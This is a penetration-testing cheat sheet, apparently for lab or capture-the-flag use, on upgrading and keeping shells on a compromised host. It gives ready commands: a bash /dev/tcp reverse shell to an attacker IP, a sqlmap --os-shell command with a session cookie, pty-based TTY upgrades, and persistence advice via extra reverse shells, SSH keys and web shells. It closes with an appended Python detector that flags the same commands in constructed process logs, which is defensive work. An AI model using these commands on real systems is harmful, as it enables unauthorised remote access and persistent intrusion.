CheatSheet

Enhancing Your Shell

Techniques for upgrading basic shells to fully interactive TTY shells.

Using Python

The most common method for spawning a TTY shell using Python's pty module:

python -c "import pty;pty.spawn('/bin/bash')"

Using Bash

Alternative method using the script command, which allocates a pseudo-terminal and runs the shell named in SHELL (the session log is discarded to /dev/null):

SHELL=/bin/bash script -q /dev/null

Getting a More Stable Shell Via Reverse Shell

Establish a reverse shell connection directly to your attacking machine:

bash -c "bash -i >& /dev/tcp/10.10.14.43/443 0>&1"

Note: Replace the IP address and port with your attacking machine's details.

Getting a Shell with SqlMap

Use SqlMap's built-in OS shell feature to spawn a shell through SQL injection:

sqlmap -u 'http://10.129.129.83/dashboard.php?search=any+query' --cookie="PHPSESSID=7s708ososphb91h343iqr2ss7a" --os-shell

Getting an Interactive Shell (Python3)

The complete process to upgrade a basic reverse shell to a fully interactive TTY shell:

Step 1: Spawn a PTY

On the victim machine, run within your basic shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Step 2: Background the Process

Press Ctrl+Z to background the shell:

^Z

Step 3: Configure Terminal Settings

On your attacking machine, put the local terminal into raw mode and disable echo, so that keystrokes such as Ctrl+C and tab are passed through to the remote shell instead of being handled by your local terminal:

stty raw -echo

Step 4: Foreground the Process

Return to the backgrounded shell:

fg

Step 5: Reinitialize Bash

In the newly foregrounded shell, run:

bash

Result: You now have a fully interactive shell with tab completion, command history, and proper terminal handling.

Enhancing the Shell to Clear Screen

If you encounter the error "TERM environment variable not set" when trying to use commands like clear, set the TERM variable:

export TERM=xterm

This enables proper terminal emulation and allows you to use terminal-specific commands like clear, vim, nano, and others that require terminal control sequences.

Establishing Another Shell

Once you have initial access, it's often beneficial to establish multiple shell sessions for stability and redundancy. This can be done by:

  • Setting up additional reverse shells to different ports
  • Creating SSH access if you have credentials or can write SSH keys
  • Using screen or tmux sessions for persistence
  • Deploying web shells for HTTP-based access

Having multiple access points ensures you maintain access even if one shell dies or becomes unstable.

Quick Reference

Complete Upgrade Process (One-liner reference):

# On victim:
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Press Ctrl+Z

# On attacker:
stty raw -echo; fg

# On victim (after fg):
bash
export TERM=xterm
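A defender's counterpart to the techniques on this page, added here as an example rather than anything from the original cheat sheet: a small Python detector that parses constructed process-execution events (the simplified log format, the sample lines and the service-account UID set are all assumptions for the example) and flags the pty.spawn, script -q /dev/null and /dev/tcp patterns, rating a hit higher when the executing uid is a service account.

```python
import re

# Constructed sample of process-execution events (not from any real host): "<ts> uid=<uid> pid=<pid> cmd=<cmdline>"
SAMPLE_LOG = """\
2024-01-01T10:00:01Z uid=33 pid=4101 cmd=python3 -c 'import pty; pty.spawn("/bin/bash")'
2024-01-01T10:00:02Z uid=33 pid=4102 cmd=bash -c "bash -i >& /dev/tcp/10.10.14.43/443 0>&1"
2024-01-01T10:00:05Z uid=1000 pid=4110 cmd=ls -la /home/user
2024-01-01T10:00:07Z uid=33 pid=4115 cmd=script -q /dev/null
2024-01-01T10:00:09Z uid=1000 pid=4120 cmd=python3 manage.py runserver
2024-01-01T10:00:11Z uid=1000 pid=4125 cmd=script -q session.log
"""

# One rule per technique from the cheat sheet, matched against the command line only.
TTY_UPGRADE_RULES = [
    ("python-pty-spawn", re.compile(r"\bpty\.spawn\s*\(")),
    ("script-tty-spawn", re.compile(r"^script\b.*\s-q\b.*/dev/null")),
    ("bash-dev-tcp-reverse-shell", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
]

# Accounts that should never run an interactive shell. 33 is www-data on Debian-based
# systems; this set is an assumption for the example, adjust it to the hosts you monitor.
SERVICE_UIDS = {33}

LINE_RE = re.compile(r"^(?P<ts>\S+) uid=(?P<uid>\d+) pid=(?P<pid>\d+) cmd=(?P<cmd>.*)$")

def parse_event(line):
    """Parse one log line into a dict, or return None for lines in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["uid"], event["pid"] = int(event["uid"]), int(event["pid"])
    return event

def scan(log_text):
    """Return one alert per matching event with the rule name, severity, pid, uid and cmd."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None:
            continue
        for rule_name, pattern in TTY_UPGRADE_RULES:
            if pattern.search(event["cmd"]):
                # A TTY or reverse shell under a service account is the classic post-web-exploitation signal.
                severity = "high" if event["uid"] in SERVICE_UIDS else "medium"
                alerts.append({"rule": rule_name, "severity": severity, "pid": event["pid"],
                               "uid": event["uid"], "cmd": event["cmd"]})
                break
    return alerts
```

Run it over the sample and the three shell-spawning lines come back as high-severity alerts while the ordinary commands are ignored; feed it real exec telemetry in the same four-field shape to use it as a starting rule set.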